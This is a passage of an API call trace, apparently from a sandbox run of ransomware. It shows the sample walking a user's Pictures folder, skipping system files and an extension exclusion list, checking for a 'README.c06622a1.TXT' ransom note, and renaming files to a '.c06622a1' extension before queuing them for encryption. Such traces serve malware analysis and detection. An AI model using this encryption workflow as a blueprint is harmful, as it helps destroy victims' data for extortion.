pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="" [0155.357] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned 0x2b [0155.357] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", fInfoLevelId=0x0, lpFindFileData=0x3fecec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fecec) returned 0x2db8740 [0155.357] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb364320, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb364320, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.358] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a9a3b50, ftCreationTime.dwHighDateTime=0x1d5df30, ftLastAccessTime.dwLowDateTime=0xe9c2d140, ftLastAccessTime.dwHighDateTime=0x1d5e4da, ftLastWriteTime.dwLowDateTime=0xe9c2d140, ftLastWriteTime.dwHighDateTime=0x1d5e4da, nFileSizeHigh=0x0, nFileSizeLow=0xac04, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cxag45AySZdPT 78RxE_.gif", cAlternateFileName="CXAG45~1.GIF")) returned 1 [0155.358] _wcsicmp (_Str1="Cxag45AySZdPT 78RxE_.gif", _Str2="README.c06622a1.TXT") returned -15 [0155.358] wcsstr (_Str="Cxag45AySZdPT 78RxE_.gif", _SubStr="README") returned 0x0 [0155.358] _wcsicmp (_Str1="autorun.inf", _Str2="Cxag45AySZdPT 78RxE_.gif") returned -2 [0155.358] wcslen (_String="autorun.inf") returned 0xb [0155.358] _wcsicmp (_Str1="boot.ini", _Str2="Cxag45AySZdPT 78RxE_.gif") returned -1 [0155.358] wcslen (_String="boot.ini") returned 0x8 [0155.358] _wcsicmp (_Str1="bootfont.bin", _Str2="Cxag45AySZdPT 78RxE_.gif") returned -1 [0155.358] wcslen (_String="bootfont.bin") returned 0xc [0155.358] _wcsicmp (_Str1="bootsect.bak", _Str2="Cxag45AySZdPT 78RxE_.gif") returned -1 [0155.358] wcslen (_String="bootsect.bak") returned 0xc [0155.358] _wcsicmp (_Str1="desktop.ini", _Str2="Cxag45AySZdPT 78RxE_.gif") returned 1 [0155.358] wcslen (_String="desktop.ini") returned 0xb [0155.358] _wcsicmp (_Str1="iconcache.db", _Str2="Cxag45AySZdPT 78RxE_.gif") returned 6 [0155.358] wcslen (_String="iconcache.db") returned 0xc [0155.358] _wcsicmp (_Str1="ntldr", _Str2="Cxag45AySZdPT 78RxE_.gif") returned 11 [0155.358] wcslen (_String="ntldr") returned 0x5 [0155.358] _wcsicmp (_Str1="ntuser.dat", _Str2="Cxag45AySZdPT 78RxE_.gif") returned 11 [0155.358] wcslen (_String="ntuser.dat") returned 0xa [0155.358] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Cxag45AySZdPT 78RxE_.gif") returned 11 [0155.358] wcslen (_String="ntuser.dat.log") returned 0xe [0155.358] _wcsicmp (_Str1="ntuser.ini", _Str2="Cxag45AySZdPT 78RxE_.gif") returned 11 [0155.358] wcslen (_String="ntuser.ini") returned 0xa [0155.358] _wcsicmp (_Str1="thumbs.db", _Str2="Cxag45AySZdPT 78RxE_.gif") returned 17 [0155.358] wcslen (_String="thumbs.db") returned 0x9 [0155.358] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0155.358] wcslen (_String="386") returned 0x3 [0155.358] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0155.358] wcslen (_String="adv") returned 0x3 [0155.359] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0155.359] wcslen (_String="ani") returned 0x3 [0155.359] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0155.359] wcslen (_String="bat") returned 0x3 [0155.359] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0155.359] wcslen (_String="bin") returned 0x3 [0155.359] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0155.359] wcslen (_String="cab") returned 0x3 [0155.359] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0155.359] wcslen (_String="cmd") returned 0x3 [0155.359] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0155.359] wcslen (_String="com") returned 0x3 [0155.359] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0155.359] wcslen (_String="cpl") returned 0x3 [0155.359] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0155.359] wcslen (_String="cur") returned 0x3 [0155.359] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0155.359] wcslen (_String="deskthemepack") returned 0xd [0155.359] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0155.359] wcslen (_String="diagcab") returned 0x7 [0155.359] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0155.359] wcslen (_String="diagcfg") returned 0x7 [0155.359] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0155.359] wcslen (_String="diagpkg") returned 0x7 [0155.359] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0155.359] wcslen (_String="dll") returned 0x3 [0155.359] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0155.359] wcslen (_String="drv") returned 0x3 [0155.359] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0155.359] wcslen (_String="exe") returned 0x3 [0155.359] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0155.359] wcslen (_String="hlp") returned 0x3 [0155.359] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0155.359] wcslen (_String="icl") returned 0x3 [0155.359] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0155.359] wcslen (_String="icns") returned 0x4 [0155.360] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0155.360] wcslen (_String="ico") returned 0x3 [0155.360] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0155.360] wcslen (_String="ics") returned 0x3 [0155.360] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0155.360] wcslen (_String="idx") returned 0x3 [0155.360] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0155.360] wcslen (_String="ldf") returned 0x3 [0155.360] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0155.360] wcslen (_String="lnk") returned 0x3 [0155.360] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0155.360] wcslen (_String="mod") returned 0x3 [0155.360] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0155.360] wcslen (_String="mpa") returned 0x3 [0155.360] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0155.360] wcslen (_String="msc") returned 0x3 [0155.360] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0155.360] wcslen (_String="msp") returned 0x3 [0155.360] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0155.360] wcslen (_String="msstyles") returned 0x8 [0155.360] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0155.360] wcslen (_String="msu") returned 0x3 [0155.360] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0155.360] wcslen (_String="nls") returned 0x3 [0155.360] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0155.360] wcslen (_String="nomedia") returned 0x7 [0155.360] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0155.360] wcslen (_String="ocx") returned 0x3 [0155.360] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0155.360] wcslen (_String="prf") returned 0x3 [0155.360] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0155.360] wcslen (_String="ps1") returned 0x3 [0155.360] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0155.360] wcslen (_String="rom") returned 0x3 [0155.360] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0155.360] wcslen (_String="rtp") returned 0x3 [0155.360] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0155.360] wcslen (_String="scr") returned 0x3 [0155.361] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0155.361] wcslen (_String="shs") returned 0x3 [0155.361] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0155.361] wcslen (_String="spl") returned 0x3 [0155.361] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0155.361] wcslen (_String="sys") returned 0x3 [0155.361] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0155.361] wcslen (_String="theme") returned 0x5 [0155.361] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0155.361] wcslen (_String="themepack") returned 0x9 [0155.361] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0155.361] wcslen (_String="wpx") returned 0x3 [0155.361] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0155.361] wcslen (_String="lock") returned 0x4 [0155.361] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0155.361] wcslen (_String="key") returned 0x3 [0155.361] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0155.361] wcslen (_String="hta") returned 0x3 [0155.361] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0155.361] wcslen (_String="msi") returned 0x3 [0155.361] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0155.361] wcslen (_String="pdb") returned 0x3 [0155.361] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0155.361] wcslen (_String="sql") returned 0x3 [0155.361] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0155.361] wcslen (_String="sqlite") returned 0x6 [0155.361] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0155.361] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0155.361] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0155.361] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x2a [0155.361] wcscpy (in: _Dest=0x44d00ce, _Source="Cxag45AySZdPT 78RxE_.gif" | out: _Dest="Cxag45AySZdPT 78RxE_.gif") returned="Cxag45AySZdPT 78RxE_.gif" [0155.361] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif", dwFileAttributes=0x80) returned 1 [0155.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cxag45ayszdpt 78rxe_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x680 [0155.362] SetFilePointerEx (in: hFile=0x680, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.362] ReadFile (in: hFile=0x680, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0155.363] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x4d39c33c [0155.363] RtlComputeCrc32 (PartialCrc=0xc33c, Buffer=0x3feb74, Length=0x80) returned 0xb926923a [0155.363] RtlComputeCrc32 (PartialCrc=0x923a, Buffer=0x3feb74, Length=0x80) returned 0x567a5591 [0155.363] RtlComputeCrc32 (PartialCrc=0x5591, Buffer=0x3feb74, Length=0x80) returned 0x7e53c6e6 [0155.363] RtlComputeCrc32 (PartialCrc=0xc6e6, Buffer=0x3feb74, Length=0x80) returned 0xa79dc71b [0155.363] CloseHandle (hObject=0x680) returned 1 [0155.363] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0155.363] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif" [0155.363] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif") returned 0x43 [0155.363] wcscpy (in: _Dest=0x44e0106, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.363] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cxag45ayszdpt 78rxe_.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cxag45ayszdpt 78rxe_.gif.c06622a1"), dwFlags=0x8) returned 1 [0155.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Cxag45AySZdPT 78RxE_.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cxag45ayszdpt 78rxe_.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x680 [0155.367] CreateIoCompletionPort (FileHandle=0x680, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.367] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2880020 [0155.372] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xf0fad35 [0155.372] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1e1f8d74 [0155.372] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x21390582 [0155.372] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x36a40c50 [0155.372] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x352bba47 [0155.372] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xf2a7912 [0155.372] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2877221c [0155.372] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x512a4920 [0155.376] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2880094, Length=0x80) returned 0xa1705bc1 [0155.376] RtlComputeCrc32 (PartialCrc=0x5bc1, Buffer=0x2880094, Length=0x80) returned 0xc4d2ea63 [0155.376] RtlComputeCrc32 (PartialCrc=0xea63, Buffer=0x2880094, Length=0x80) returned 0x33948c65 [0155.376] RtlComputeCrc32 (PartialCrc=0x8c65, Buffer=0x2880094, Length=0x80) returned 0x603db81d [0155.376] RtlComputeCrc32 (PartialCrc=0xb81d, Buffer=0x2880094, Length=0x80) returned 0x8dfaebe8 [0155.376] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2880020) returned 1 [0155.376] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0155.376] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0155.376] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.376] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0155.376] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0155.376] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0155.376] wcslen (_String="autorun.inf") returned 0xb [0155.376] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0155.376] wcslen (_String="boot.ini") returned 0x8 [0155.376] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0155.376] wcslen (_String="bootfont.bin") returned 0xc [0155.376] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0155.377] wcslen (_String="bootsect.bak") returned 0xc [0155.377] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0155.377] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65a24720, ftCreationTime.dwHighDateTime=0x1d5e11e, ftLastAccessTime.dwLowDateTime=0x9e78eb80, ftLastAccessTime.dwHighDateTime=0x1d5dba1, ftLastWriteTime.dwLowDateTime=0x9e78eb80, ftLastWriteTime.dwHighDateTime=0x1d5dba1, nFileSizeHigh=0x0, nFileSizeLow=0x7917, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnG-N3d9o.png", cAlternateFileName="DNG-N3~1.PNG")) returned 1 [0155.377] _wcsicmp (_Str1="DnG-N3d9o.png", _Str2="README.c06622a1.TXT") returned -14 [0155.377] wcsstr (_Str="DnG-N3d9o.png", _SubStr="README") returned 0x0 [0155.377] _wcsicmp (_Str1="autorun.inf", _Str2="DnG-N3d9o.png") returned -3 [0155.377] wcslen (_String="autorun.inf") returned 0xb [0155.377] _wcsicmp (_Str1="boot.ini", _Str2="DnG-N3d9o.png") returned -2 [0155.377] wcslen (_String="boot.ini") returned 0x8 [0155.377] _wcsicmp (_Str1="bootfont.bin", _Str2="DnG-N3d9o.png") returned -2 [0155.377] wcslen (_String="bootfont.bin") returned 0xc [0155.377] _wcsicmp (_Str1="bootsect.bak", _Str2="DnG-N3d9o.png") returned -2 [0155.377] wcslen (_String="bootsect.bak") returned 0xc [0155.377] _wcsicmp (_Str1="desktop.ini", _Str2="DnG-N3d9o.png") returned -9 [0155.377] wcslen (_String="desktop.ini") returned 0xb [0155.377] _wcsicmp (_Str1="iconcache.db", _Str2="DnG-N3d9o.png") returned 5 [0155.377] wcslen (_String="iconcache.db") returned 0xc [0155.377] _wcsicmp (_Str1="ntldr", _Str2="DnG-N3d9o.png") returned 10 [0155.377] wcslen (_String="ntldr") returned 0x5 [0155.377] _wcsicmp (_Str1="ntuser.dat", _Str2="DnG-N3d9o.png") returned 10 [0155.377] wcslen (_String="ntuser.dat") returned 0xa [0155.377] _wcsicmp (_Str1="ntuser.dat.log", _Str2="DnG-N3d9o.png") returned 10 [0155.377] wcslen (_String="ntuser.dat.log") returned 0xe [0155.377] _wcsicmp (_Str1="ntuser.ini", _Str2="DnG-N3d9o.png") returned 10 [0155.377] wcslen (_String="ntuser.ini") returned 0xa [0155.377] _wcsicmp (_Str1="thumbs.db", _Str2="DnG-N3d9o.png") returned 16 [0155.377] wcslen (_String="thumbs.db") returned 0x9 [0155.377] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.377] wcslen (_String="386") returned 0x3 [0155.377] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.377] wcslen (_String="adv") returned 0x3 [0155.377] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.377] wcslen (_String="ani") returned 0x3 [0155.377] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.377] wcslen (_String="bat") returned 0x3 [0155.377] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.377] wcslen (_String="bin") returned 0x3 [0155.377] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.378] wcslen (_String="cab") returned 0x3 [0155.378] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.378] wcslen (_String="cmd") returned 0x3 [0155.378] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.378] wcslen (_String="com") returned 0x3 [0155.378] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.378] wcslen (_String="cpl") returned 0x3 [0155.378] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.378] wcslen (_String="cur") returned 0x3 [0155.378] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.378] wcslen (_String="deskthemepack") returned 0xd [0155.378] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.378] wcslen (_String="diagcab") returned 0x7 [0155.378] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.378] wcslen (_String="diagcfg") returned 0x7 [0155.378] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.378] wcslen (_String="diagpkg") returned 0x7 [0155.378] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.378] wcslen (_String="dll") returned 0x3 [0155.378] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.378] wcslen (_String="drv") returned 0x3 [0155.378] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.378] wcslen (_String="exe") returned 0x3 [0155.378] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.378] wcslen (_String="hlp") returned 0x3 [0155.378] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.378] wcslen (_String="icl") returned 0x3 [0155.378] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.378] wcslen (_String="icns") returned 0x4 [0155.378] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.378] wcslen (_String="ico") returned 0x3 [0155.378] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.378] wcslen (_String="ics") returned 0x3 [0155.378] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.378] wcslen (_String="idx") returned 0x3 [0155.378] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.378] wcslen (_String="ldf") returned 0x3 [0155.378] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.378] wcslen (_String="lnk") returned 0x3 [0155.379] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.379] wcslen (_String="mod") returned 0x3 [0155.379] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.379] wcslen (_String="mpa") returned 0x3 [0155.379] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.379] wcslen (_String="msc") returned 0x3 [0155.379] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.379] wcslen (_String="msp") returned 0x3 [0155.379] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.379] wcslen (_String="msstyles") returned 0x8 [0155.379] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.379] wcslen (_String="msu") returned 0x3 [0155.379] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.379] wcslen (_String="nls") returned 0x3 [0155.379] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.379] wcslen (_String="nomedia") returned 0x7 [0155.379] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.379] wcslen (_String="ocx") returned 0x3 [0155.379] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.379] wcslen (_String="prf") returned 0x3 [0155.379] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.379] wcslen (_String="ps1") returned 0x3 [0155.379] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.379] wcslen (_String="rom") returned 0x3 [0155.379] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.379] wcslen (_String="rtp") returned 0x3 [0155.379] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.379] wcslen (_String="scr") returned 0x3 [0155.379] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.379] wcslen (_String="shs") returned 0x3 [0155.379] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.379] wcslen (_String="spl") returned 0x3 [0155.379] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.379] wcslen (_String="sys") returned 0x3 [0155.379] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.379] wcslen (_String="theme") returned 0x5 [0155.379] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.379] wcslen (_String="themepack") returned 0x9 [0155.380] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.380] wcslen (_String="wpx") returned 0x3 [0155.380] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.380] wcslen (_String="lock") returned 0x4 [0155.380] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.380] wcslen (_String="key") returned 0x3 [0155.380] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.380] wcslen (_String="hta") returned 0x3 [0155.380] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.380] wcslen (_String="msi") returned 0x3 [0155.380] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.380] wcslen (_String="pdb") returned 0x3 [0155.380] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.380] wcslen (_String="sql") returned 0x3 [0155.380] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.380] wcslen (_String="sqlite") returned 0x6 [0155.380] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0155.380] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0155.380] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0155.380] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x2a [0155.380] wcscpy (in: _Dest=0x44d00ce, _Source="DnG-N3d9o.png" | out: _Dest="DnG-N3d9o.png") returned="DnG-N3d9o.png" [0155.380] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png", dwFileAttributes=0x80) returned 1 [0155.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\DnG-N3d9o.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dng-n3d9o.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0155.381] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.381] ReadFile (in: hFile=0x134, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0155.382] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0xd8d10448 [0155.382] RtlComputeCrc32 (PartialCrc=0x448, Buffer=0x3feb74, Length=0x80) returned 0x5a9c7e25 [0155.382] RtlComputeCrc32 (PartialCrc=0x7e25, Buffer=0x3feb74, Length=0x80) returned 0xbe477b2e [0155.382] RtlComputeCrc32 (PartialCrc=0x7b2e, Buffer=0x3feb74, Length=0x80) returned 0xe4d924fe [0155.382] RtlComputeCrc32 (PartialCrc=0x24fe, Buffer=0x3feb74, Length=0x80) returned 0x83fabd88 [0155.382] CloseHandle (hObject=0x134) returned 1 [0155.382] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0155.382] wcscpy (in: _Dest=0x44e0080, 